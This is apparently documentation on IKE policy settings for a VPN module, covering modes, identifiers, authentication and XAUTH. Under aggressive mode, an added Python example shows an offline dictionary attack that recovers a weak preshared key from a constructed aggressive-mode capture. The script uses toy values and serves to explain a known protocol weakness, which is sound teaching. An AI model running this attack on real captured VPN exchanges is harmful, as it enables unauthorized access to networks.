About IKE Policies

IKE (Internet Key Exchange) is the protocol that negotiates the security associations (SAs) and keying material for a VPN tunnel. Keys negotiated by IKE are more secure than manually configured keys because they are derived from a fresh Diffie-Hellman exchange, are random, and are replaced periodically when the SA lifetime expires. Using IKE is also much easier than manual keying because the process is largely automated.

You configure the following parameters for each IKE policy:

IKE Policy Types

  • Site-to-Site (Initiator & Responder) — Two permanent VPN gateways form the ends of the VPN tunnel; commonly used between a main office and branch offices. Either gateway can initiate the VPN.

  • Client-to-Site (Responder) — A remote VPN client contacts a VPN gateway; commonly used between a corporate network and an employee who is on the road or at home. Only the remote VPN client initiates the VPN.

Gateways

  • Local — An IP address that the other gateway or client can reach. If the local gateway is behind a NAT device, it should be the public address.

  • Remote — The IP address of the peer gateway that the local gateway can reach. If the remote gateway is behind a NAT device, it should be the public address. This parameter is configured only for site-to-site VPNs; in a client-to-site VPN the client's address is not known in advance.

Identifiers

Each gateway has an identifier (ID) that it uses to authenticate itself to its peer. The ID can be an IP address (which must be the gateway's own address), an FQDN, an email address (user FQDN), or a DN (Distinguished Name). A DN can be used only when the authentication method is an RSA (Rivest-Shamir-Adleman) or DSA (Digital Signature Algorithm) signature, because the DN is taken from the gateway's certificate.

Key Exchange Mode

  • Main — The negotiation consists of six messages (three round trips) between the gateways. The identifiers and authentication hashes are carried in the last two messages, which are already encrypted with keys from the Diffie-Hellman exchange, so a passive observer learns neither.

  • Aggressive — The same negotiation is compressed into three messages. It is faster than main mode but less secure because the gateways must send their identifiers and authentication hashes before any encryption is in place. With preshared-key authentication, the responder's hash in the second message can be captured and attacked with an offline dictionary attack, so aggressive mode with a preshared key should be used only with a long random key, if at all. It is typically chosen when the initiator has a dynamic address, because main mode with a preshared key can select the key only by the peer's IP address.
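The following Python script is an added example; it is not part of this documentation or of the TMS zl Module software. It models the responder's HASH_R from an aggressive-mode exchange as defined in RFC 2409 (SKEYID = prf(preshared-key, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with prf = HMAC-SHA1), shows that every input except the preshared key is visible in the first two cleartext messages, and then recovers a weak preshared key from a constructed capture with a dictionary attack. The Diffie-Hellman group is a toy group, the SA payload body and identifiers are constructed stand-ins, and the wordlist is made up; none of these are real IKE values.

```python
"""Offline dictionary attack on IKEv1 aggressive mode with a preshared key.

Added example (not from the original page).  All values below are
constructed: a toy Diffie-Hellman group (not an IKE group), a stand-in SA
payload body, made-up identifiers and a made-up wordlist.
"""
import hashlib
import hmac
import secrets
from typing import Dict, List, Optional, Tuple

# Toy DH group for illustration only: 2^127 - 1 is prime, generator 2.
TOY_P = (1 << 127) - 1
TOY_G = 2


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf: HMAC keyed with `key` over `data` (SHA-1 variant)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def dh_keypair() -> Tuple[int, bytes]:
    """Private exponent and 16-byte big-endian public value in the toy group."""
    x = secrets.randbelow(TOY_P - 2) + 1
    return x, pow(TOY_G, x, TOY_P).to_bytes(16, "big")


def hash_r(psk: bytes, ni: bytes, nr: bytes, gxi: bytes, gxr: bytes,
           cky_i: bytes, cky_r: bytes, sai_b: bytes, idir_b: bytes) -> bytes:
    """HASH_R as the responder computes it (RFC 2409, sections 5 and 5.4)."""
    skeyid = prf(psk, ni + nr)
    return prf(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b)


def aggressive_mode_capture(psk: bytes, idir_b: bytes) -> Dict[str, bytes]:
    """What a passive observer sees in aggressive-mode messages 1 and 2.

    Message 1 (initiator): HDR, SA, KE, Ni, IDii
    Message 2 (responder): HDR, SA, KE, Nr, IDir, HASH_R
    Nothing here is encrypted, so every field below is attacker-visible.
    """
    cky_i, cky_r = secrets.token_bytes(8), secrets.token_bytes(8)  # HDR cookies
    ni, nr = secrets.token_bytes(20), secrets.token_bytes(20)      # nonces
    _, gxi = dh_keypair()                                          # KE payloads
    _, gxr = dh_keypair()
    # Constructed stand-in for the initiator's SA payload body (the proposal).
    sai_b = b"\x00\x00\x00\x01" + b"PSK-SHA1-3DES-DH2"
    return {
        "cky_i": cky_i, "cky_r": cky_r, "ni": ni, "nr": nr,
        "gxi": gxi, "gxr": gxr, "sai_b": sai_b, "idir_b": idir_b,
        "hash_r": hash_r(psk, ni, nr, gxi, gxr, cky_i, cky_r, sai_b, idir_b),
    }


def recover_psk(capture: Dict[str, bytes], wordlist: List[str]) -> Optional[str]:
    """Recompute HASH_R for each candidate key and compare with the capture.

    Only the preshared key is unknown; everything else is read from the two
    cleartext messages.  In main mode HASH_R travels encrypted, so a passive
    capture gives an attacker nothing to test candidates against.
    """
    for candidate in wordlist:
        guess = hash_r(candidate.encode(), capture["ni"], capture["nr"],
                       capture["gxi"], capture["gxr"], capture["cky_i"],
                       capture["cky_r"], capture["sai_b"], capture["idir_b"])
        if hmac.compare_digest(guess, capture["hash_r"]):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed scenario: a responder identified by FQDN with a weak PSK.
    cap = aggressive_mode_capture(b"winter2010", b"vpn.example.com")
    words = ["password", "letmein", "winter2010", "summer2010"]
    print("recovered preshared key:", recover_psk(cap, words))
```

A long random preshared key defeats this attack only because the dictionary cannot contain it; the exposure of HASH_R itself is inherent to aggressive mode. Main mode, or certificate-based authentication, removes the offline attack surface rather than relying on key entropy.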

Authentication Method

  • Preshared Key — The same secret key is manually configured on each end of the VPN tunnel. Its strength depends entirely on its length and randomness, since anyone who knows or guesses it can authenticate as either peer.

  • RSA or DSA Signature — Each gateway proves its identity with a digital signature made with the private key that corresponds to a certificate issued by a CA (Certificate Authority) trusted by the peer. The peer verifies the signature against the certificate and the CA.

SA Lifetime

The amount of time that an SA is valid. When it elapses, the SA expires and must be renegotiated, which produces fresh keys.

XAUTH (eXtended AUTHentication)

An optional, additional layer of authentication that runs after the IKE SA is established, in which one side supplies user credentials such as a username and password. In client-to-site VPNs, the Threat Management Services (TMS) zl Module is configured as an XAUTH server (it checks the remote user's credentials), and in site-to-site VPNs, the module is configured as an XAUTH client (it supplies credentials to the remote gateway).